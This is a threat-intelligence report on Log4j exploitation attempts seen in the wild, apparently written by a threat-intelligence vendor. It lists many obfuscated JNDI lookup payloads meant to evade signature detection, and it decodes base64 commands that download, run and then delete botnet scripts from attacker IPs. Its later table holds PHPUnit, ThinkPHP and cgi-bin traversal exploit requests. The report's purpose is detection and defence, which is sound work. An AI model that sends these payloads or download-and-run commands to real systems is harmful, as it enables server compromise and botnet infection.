The Log4j vulnerability has affected organizations worldwide, and attackers scan servers around the world daily in search of hosts exposed to it, since a successful exploit can give them control of the server. We closely examined the scanning techniques they use to identify servers with the Log4j vulnerability.
The attackers' primary method is to send the string "${jndi:ldap://..**:53/c}" and analyze the server's response. This pattern has received extensive media coverage, however, and is now quickly detected and blocked by IDS/IPS systems. As a result, modified attack techniques are in use, as listed in the table below. These variant packets split the payload and send it in forms such as "j}ndi", "{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}" and "${jndi:${lower:l}${lower:d}a${lower:p}", so that the signature "jndi:ldap" never appears literally in the request and goes undetected.
| Common Attack Patterns in Log4j Exploits |
|---|
| ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" |
| "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152 ""-"" ""${jndi:ldap://45.12.32.61:1389/OS=${sys:os.name}/HN=${env:HOSTNAME}/feb12a13-5fe3-429a-bd12-ed0c72e2ad20}"" 80" |
| ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjguMjM1LjgyLjU1OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY4LjIzNS44Mi41NTo4MDgwKXxiYXNo |
| ${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback} |
Log4j Attack Patterns With Encoding
Attackers also use encoding to evade detection of Log4j attack patterns. By encoding the string that follows the LDAP URL's host and port, they can bypass firewalls, security devices, and log analysis systems such as ESM (Enterprise Security Management). The table below presents representative examples of encoded attack methods. The encoded part of these queries is typically Base64. Once decoded, it usually reveals Linux commands such as wget, bash, python, and chmod, which are commonly used in attacks. Let's now proceed to the actual decoding.
| Log4j attack pattern with additional encoding |
|---|
| ('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//209.141.57.192:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')" |
| ('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')" |
| {jndi:ldap://121.140.99.236:1389/Exploit} |
| {jndi:dns://168-235-82-55.referer.scanworld.net}" "{jndi:dns://168-235-82-55.useragent.scanworld.net} |
| ('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}')" |
| ('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//209.141.57.192:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')" |
| "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j}')" |
The table below shows the decoded results of these encoded queries.
In the first scenario, the attackers download the attack script "Exploit.sh" from their server using tools such as wget and curl. The downloaded file is made executable and run, and the script then installs the malicious code. Notably, the attackers delete the downloaded script after it has run, so backdoors, trojan horses, and keyloggers are frequently installed without the victims' knowledge.
The second scenario, the command 'wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup;', fetches the same file twice, once with wget and once with curl, so the download succeeds even if only one of the two tools is installed on the server. This shows the script is designed to ensure infection regardless of the server's environment. As in the first scenario, the script then sets the file's permissions to 777 with chmod to make it executable, and running it infects the host.
In the third scenario we see the pattern cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;, which is commonly associated with botnet attacks. Analysis of the bins.sh file reveals it to be a foothold for executing further malicious code belonging to the same botnet. A recent alert has been issued regarding the Mozi botnet, which is closely associated with this type of attack.
| # | Encoded segment | Decoded command |
|---|---|---|
| 1 | /TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}') | wget **.***.**.**/Exploit.sh; chmod +x Exploit.sh; ./Exploit.sh; rm -rf Exploit.sh |
| 2 | TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}') | wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit |
| 3 | /TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}')" | cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; curl http://192.95.50.228/bins.sh -o bins.sh; wget http://192.95.50.228/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c |
| 4 | TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j}') | cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; curl http://135.148.91.146/bins.sh -o bins.sh; wget http://135.148.91.146/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c |
Where Log4j vulnerabilities are present, the attacks commonly download files containing malicious or attack code from specific server IP addresses. When these attacks are decoded, the IP addresses used for the download via tools such as wget or curl are frequently ones already flagged as critical. Checking these IP addresses with Criminal IP can therefore confirm their criticality.

Response Method – Signature Detection Variations
First and foremost, the defense at the IPS/IDS/WAF stage should focus on the irregular methods attackers use to evade detection rules. It is not necessary to register every attack keyword listed below one by one, nor to rely heavily on regular expressions. The common characteristic of these attacks is the format 'jndi:ldap://hacker-server/Query'. 'jndi' and 'ldap' should already be registered for Log4j detection; the variants below can additionally be detected by incorporating keywords such as '${:', 'rmi', and '${lower:'.
| Log4j lookup variants (attacker host shown as domain.com) |
|---|
| ${jndi:ldap://domain.com/j} |
| ${jndi:ldap:/domain.com/a} |
| ${jndi:dns:/domain.com} |
| ${jndi:dns://domain.com/j} |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} |
| ${${::-j}ndi:rmi://domain.com/j} |
| ${jndi:rmi://domainldap.com/j} |
| ${${lower:jndi}:${lower:rmi}://domain.com/j} |
| ${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j} |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} |
| ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j} |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} |
| ${jndi:${lower:l}${lower:d}a${lower:p}://domain.com} |
| ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a} |
| ${jn${env::-}di:ldap://domain.com/j} |
| ${jn${date:}di${date:':'}ldap://domain.com/j} |
| ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j} |
| ${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j} |
| ${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j} |
| ${j${::-nD}i${::-:}ldap://domain.com/j} |
| ${j${EnV:K5:-nD}i:ldap://domain.com/j} |
| ${j${loWer:Nd}i${uPper::}ldap://domain.com/j} |
| ${jndi:ldap://127.0.0.1#domain.com/j} |
| ${jnd${upper:ı}:ldap://domain.com/j} |
| ${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j} |
| ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j} |
| ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://domain.com/j} |
| ${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j} |
| ${\u006a\u006e\u0064\u0069:ldap://domain.com/j} |
| ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j} |
| ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j} |
| %24%7Bjndi:ldap://domain.com/j%7D |
| %24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D |
Response Method – Verification of Download IP Addresses
In addition, the URL or IP address included in the query is verified with an IP intelligence system. For instance, a check with Criminal IP shows that 46.161.52.37, the host in the query, has a known security vulnerability, has a history of being recorded in honeypots, and is included in a Snort signature. These factors are evaluated together into a single critical score, designating it as a critical IP.
| Decoded command referencing 46.161.52.37 |
|---|
| http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2 |

Detected Attacks With Log4j
The attack packets below are only some of the many discovered during Log4j scanning, as attackers do not limit themselves to a single attack. Since the Log4j vulnerability emerged, it has been crucial to go beyond defending against Log4j alone and to monitor the logs for the IP addresses from which the Log4j attacks originated. The collected web logs show that extensive scanning and remote code execution attempts were carried out before the Log4j attack. It is therefore essential to apply security patches not only for the identified attacks but also for existing or overlooked vulnerabilities across the whole environment.
| Other attack requests seen from the same Log4j-scanning IP addresses |
|---|
| POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 |
| GET /solr/admin/info/system?wt=json |
| GET /securityRealm/user/admin/search/index?q=a HTTP/1.1 |
| GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" |
| GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1 |
| GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 |
| GET /console/ |
| POST /Autodiscover/Autodiscover.xml HTTP/1.1 |
| POST /_ignition/execute-solution HTTP/1.1 |
| POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 <- cat /etc/passwd |
| "POST /api/v1 HTTP/1.1 |
This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine.